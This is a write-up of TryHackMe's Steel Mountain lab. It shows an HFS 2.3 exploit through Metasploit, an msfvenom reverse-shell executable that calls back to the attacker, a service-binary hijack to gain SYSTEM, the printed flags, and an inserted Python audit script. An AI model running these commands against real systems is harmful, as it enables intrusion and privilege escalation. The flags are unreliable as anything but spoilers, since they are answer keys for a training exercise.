thm-steelmountain-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play TryHackMe’s Steel Mountain at

https://tryhackme.com/room/gatekeeper

Credits to the room creator/s.

TryHackMe – Steel Mountain

[Task 1] Introduction

In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.


#1 Deploy the machine.

Who is the employee of the month?


[Task 2] Initial Access

Now you have deployed the machine, lets get an initial shell!


#1 Scan the machine with nmap. What is the other port running a web server on?
#2 Take a look at the other web server. What file server is running?
#3 What is the CVE number to exploit this file server?
#4 Use Metasploit to get an initial shell. What is the user flag?

[Task 3] Privilege Escalation

Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!


#1 To enumerate this machine, we will use a PowerShell script called PowerUp, whose purpose is to evaluate a Windows machine and determine any abnormalities – “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.”

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

#2 Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?
#3 The CanRestart option being true allows us to restart a service on the system, and the directory of the application is also writable. This means we can replace the legitimate application with our malicious one and restart the service, which will run our infected program!

Use msfvenom to generate a reverse shell as a Windows executable.

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.

#4 What is the root flag?

[Task 4] Access and Escalation Without Metasploit

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to


#1 To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

#2 Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

What powershell -c command could we run to manually find out the service name?

*Format is “powershell -c “command here”*

#3 Now let’s escalate to Administrator with our new found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service which we can do like so;

sc stop AdvancedSystemCareService9

Shortly followed by;

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!


Here’s the writeup:

As always we start with an nmap scan

kali@kali:~/thm$ nmap -A 10.10.55.161 -oN steelmountain.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-17 03:30 EDT
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.92% done; ETC: 03:31 (0:00:00 remaining)
Stats: 0:01:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 03:31 (0:00:00 remaining)
Nmap scan report for 10.10.55.161
Host is up (0.029s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-04-17T07:31:14+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:88:1e:b5:04:44 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2020-04-17T07:31:09
|_ start_date: 2020-04-17T06:48:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.78 seconds
kali@kali:~/thm$


msf5 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.11.3.122:4444 
[*] Using URL: http://0.0.0.0:8080/PDRAuFa4r7C8h
[*] Local IP: http://192.168.1.113:8080/PDRAuFa4r7C8h
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /PDRAuFa4r7C8h
[*] Sending stage (180291 bytes) to 10.10.55.161
[*] Meterpreter session 1 opened (10.11.3.122:4444 -> 10.10.55.161:62506) at 2020-04-17 02:50:52 -0400
[!] Tried to delete %TEMP%\MGKQmXpmJuEcFF.vbs, unknown result
[*] Server stopped.

meterpreter > cd /users
meterpreter > cd bill
meterpreter > cd desktop
meterpreter > ls
Listing: C:\users\bill\desktop
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-09-27 07:07:07 -0400 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 08:42:38 -0400 user.txt

meterpreter > cat user.txt
b04763b6fcf51fcd7c13abc7db4fd365



I added Invoke-AllChecks to the bottom of the PowerUp.ps1 file.

Another way to find this:

My next move was to use wmic to check for unquoted service paths. The syntax I used was: wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """.
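The wmic pipeline above only lists the suspicious services. As an added illustration that is not part of this writeup, the Python below parses the same data exported with `/format:csv`, applies the same filters as the findstr chain, and for each auto-start service with an unquoted path reports the exact files the Service Control Manager would try before the real binary; the CSV column order and the sample rows are assumptions built from the listing on this page.

```python
import csv

# Constructed sample shaped like `wmic service get name,pathname,startmode
# /format:csv` (column order Node,Name,PathName,StartMode is assumed). The
# first three rows mirror this writeup's wmic listing; WLMS (quoted) and
# DemoSvc (manual start) are made up to exercise the filters.
SAMPLE_CSV = r"""
Node,Name,PathName,StartMode
STEELMOUNTAIN,AdvancedSystemCareService9,C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe,Auto
STEELMOUNTAIN,AWSLiteAgent,C:\Program Files\Amazon\XenTools\LiteAgent.exe,Auto
STEELMOUNTAIN,AppHostSvc,C:\Windows\system32\svchost.exe -k apphost,Auto
STEELMOUNTAIN,WLMS,"C:\Windows\system32\wlms\wlms.exe",Auto
STEELMOUNTAIN,DemoSvc,C:\Program Files\Demo Vendor\demo.exe,Manual
"""

def parse_wmic_csv(text: str) -> list[dict]:
    # QUOTE_NONE keeps the literal quotes in PathName; default quoting would
    # strip them and make a correctly quoted path look unquoted.
    lines = [ln for ln in text.splitlines() if ln.strip()]
    reader = csv.reader(lines, quoting=csv.QUOTE_NONE)
    header = next(reader)
    return [dict(zip(header, row)) for row in reader]

def hijack_candidates(pathname: str) -> list[str]:
    """Paths the Service Control Manager tries before the real binary.
    For an unquoted path with spaces, CreateProcess tries each space-delimited
    prefix with .exe appended until one exists, so every prefix before the real
    binary is a place where a planted file would run as the service account."""
    pathname = pathname.strip()
    if pathname.startswith('"') or " " not in pathname:
        return []  # quoted, or no spaces: nothing to hijack
    parts, candidates = pathname.split(" "), []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real binary; the rest are arguments
        candidates.append(prefix + ".exe")
    return candidates

def audit_services(text: str, skip_windows_dir: bool = True) -> dict[str, list[str]]:
    """Service name -> candidates for auto-start services with an unquoted path
    outside C:\\Windows (the same filters as the writeup's findstr chain).
    The fix for each finding is to quote the path, e.g. via sc config binPath=."""
    findings = {}
    for rec in parse_wmic_csv(text):
        path = rec["PathName"].strip()
        if rec["StartMode"].lower() != "auto":
            continue
        if skip_windows_dir and path.lower().lstrip('"').startswith("c:\\windows\\"):
            continue
        if cands := hijack_candidates(path):
            findings[rec["Name"]] = cands
    return findings
```

Note that the ASCService.exe directory on this box was writable outright, so the writeup replaced the real binary rather than planting one at an earlier prefix; the candidate list is what an auditor should check permissions on for both cases.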

With this information, I used msfvenom to generate a malicious binary.

kali@kali:~/thm$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: ASCService.exe


I stopped the service using Service Control (sc).

Then I uploaded the binary to C:\Program Files (x86)\IObit. Before starting the service, create a netcat listener, then drop into a shell and start the service with Service Control (sc start AdvancedSystemCareService9).

I received the reverse shell. Now, if we want to upgrade our shell, we can use the Metasploit Web Delivery module as follows.

[image: Web Delivery configuration]

I already had it pre-configured. I just changed a few things. Also, don’t forget to use the PSH delivery (set target 2). Now, just copy-paste it into the generic shell you spawned earlier and hit enter. You’ll receive the connection in Metasploit.

You upgraded the shell. Now you can run hashdump, pivot if needed and so on.

C:\users\bill\desktop>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """
Advanced SystemCare Service 9 AdvancedSystemCareService9 C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe Auto 
Application Host Helper Service AppHostSvc C:\Windows\system32\svchost.exe -k apphost Auto 
AWS Lite Guest Agent AWSLiteAgent C:\Program Files\Amazon\XenTools\LiteAgent.exe Auto 
Base Filtering Engine BFE C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork Auto 
Background Tasks Infrastructure Service BrokerInfrastructure C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
Cryptographic Services CryptSvc C:\Windows\system32\svchost.exe -k NetworkService Auto 
DCOM Server Process Launcher DcomLaunch C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
DHCP Client Dhcp C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
DNS Client Dnscache C:\Windows\system32\svchost.exe -k NetworkService Auto 
Wired AutoConfig dot3svc C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted Manual 
Diagnostic Policy Service DPS C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork Auto 
Windows Event Log EventLog C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted Auto 
COM+ Event System EventSystem C:\Windows\system32\svchost.exe -k LocalService Auto 
Windows Font Cache Service FontCache C:\Windows\system32\svchost.exe -k LocalService Auto 
Group Policy Client gpsvc C:\Windows\system32\svchost.exe -k netsvcs Auto 
IKE and AuthIP IPsec Keying Modules IKEEXT C:\Windows\system32\svchost.exe -k netsvcs Auto 
IObit Uninstaller Service IObitUnSvr C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe Auto 
IP Helper iphlpsvc C:\Windows\System32\svchost.exe -k NetSvcs Auto 
Server LanmanServer C:\Windows\system32\svchost.exe -k netsvcs Auto 
Workstation LanmanWorkstation C:\Windows\System32\svchost.exe -k NetworkService Auto 
LiveUpdate LiveUpdateSvc C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe Auto 
TCP/IP NetBIOS Helper lmhosts C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
Windows Firewall MpsSvc C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork Auto 
Distributed Transaction Coordinator MSDTC C:\Windows\System32\msdtc.exe Auto 
Network Location Awareness NlaSvc C:\Windows\System32\svchost.exe -k NetworkService Auto 
Network Store Interface Service nsi C:\Windows\system32\svchost.exe -k LocalService Auto 
Power Power C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
User Profile Service ProfSvc C:\Windows\system32\svchost.exe -k netsvcs Auto 
Remote Access Auto Connection Manager RasAuto C:\Windows\System32\svchost.exe -k netsvcs Manual 
Remote Registry RemoteRegistry C:\Windows\system32\svchost.exe -k localService Auto 
RPC Endpoint Mapper RpcEptMapper C:\Windows\system32\svchost.exe -k RPCSS Auto 
Remote Procedure Call (RPC) RpcSs C:\Windows\system32\svchost.exe -k rpcss Auto 
Security Accounts Manager SamSs C:\Windows\system32\lsass.exe Auto 
Task Scheduler Schedule C:\Windows\system32\svchost.exe -k netsvcs Auto 
System Event Notification Service SENS C:\Windows\system32\svchost.exe -k netsvcs Auto 
Shell Hardware Detection ShellHWDetection C:\Windows\System32\svchost.exe -k netsvcs Auto 
Print Spooler Spooler C:\Windows\System32\spoolsv.exe Auto 
Software Protection sppsvc C:\Windows\system32\sppsvc.exe Auto 
System Events Broker SystemEventsBroker C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
Themes Themes C:\Windows\System32\svchost.exe -k netsvcs Auto 
Distributed Link Tracking Client TrkWks C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted Auto 
User Access Logging Service UALSVC C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted Auto 
World Wide Web Publishing Service W3SVC C:\Windows\system32\svchost.exe -k iissvcs Auto 
Windows Connection Manager Wcmsvc C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
WinHTTP Web Proxy Auto-Discovery Service WinHttpAutoProxySvc C:\Windows\system32\svchost.exe -k LocalService Manual 
Windows Management Instrumentation Winmgmt C:\Windows\system32\svchost.exe -k netsvcs Auto 
Windows Remote Management (WS-Management) WinRM C:\Windows\System32\svchost.exe -k NetworkService Auto 
Windows Licensing Monitoring Service WLMS C:\Windows\system32\wlms\wlms.exe Auto

C:\users\bill\desktop>cd C:\Program Files (x86)\IObit\Advanced SystemCare\
cd C:\Program Files (x86)\IObit\Advanced SystemCare\

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING 
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
[SC] ControlService FAILED 1062:

The service has not been started.


C:\Program Files (x86)\IObit\Advanced SystemCare>^Z
Background channel 3? [y/N] y
meterpreter > upload ascservice.exe
[*] uploading : ascservice.exe -> ascservice.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): ascservice.exe -> ascservice.exe
[*] uploaded : ascservice.exe -> ascservice.exe
meterpreter > shell
Process 3640 created.
Channel 5 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\users\bill\desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A

Directory of C:\users\bill\desktop

04/16/2020 11:58 PM <DIR> .
04/16/2020 11:58 PM <DIR> ..
04/16/2020 11:58 PM 73,802 ascservice.exe
09/27/2019 05:42 AM 70 user.txt
2 File(s) 73,872 bytes
2 Dir(s) 44,160,622,592 bytes free

C:\users\bill\desktop>copy ascservice.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe"
copy ascservice.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe"
Overwrite C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe? (Yes/No/All): A
A
1 file(s) copied.

C:\users\bill\desktop>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
kali@kali:~$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.55.161] 62551
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A

Directory of c:\Users\Administrator\Desktop

09/27/2019 05:41 AM <DIR> .
09/27/2019 05:41 AM <DIR> ..
09/27/2019 05:41 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 44,262,805,504 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80
c:\Users\Administrator\Desktop>


Author : Puckiestyle
